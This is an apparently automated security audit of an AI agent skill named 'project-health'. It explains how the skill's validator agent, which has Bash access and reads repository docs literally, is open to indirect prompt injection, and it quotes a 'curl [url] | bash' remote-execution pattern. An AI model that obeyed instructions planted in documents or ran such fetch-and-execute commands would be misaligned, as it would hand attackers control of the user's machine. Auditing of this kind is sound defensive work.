project-health
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION] (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8). Evidence Chain: 1. Ingestion points: Reads all repository documentation (README.md, SETUP.md, etc.) via Read, Glob, and Grep tools. 2. Boundary markers: Entirely absent; the agent has no delimiters to distinguish between its own instructions and external content. 3. Capability inventory: The workflow-validator agent is equipped with the 'Bash' tool for command execution. 4. Sanitization: Absent; the instructions explicitly command the agent to follow instructions 'literally' and 'without gap-filling.'
- [COMMAND_EXECUTION] (HIGH): The 'workflow-validator.md' agent is granted the 'Bash' tool and instructed to 'verify that documented processes will actually work' by executing steps. This permission can be abused to run any command an attacker places in a documentation file.
- [REMOTE_CODE_EXECUTION] (HIGH): If the audited documentation contains instructions like 'curl [url] | bash', the agent's literal interpretation and available tools allow for full remote code execution on the user's environment.
Recommendations
- AI detected serious security threats
Audit Metadata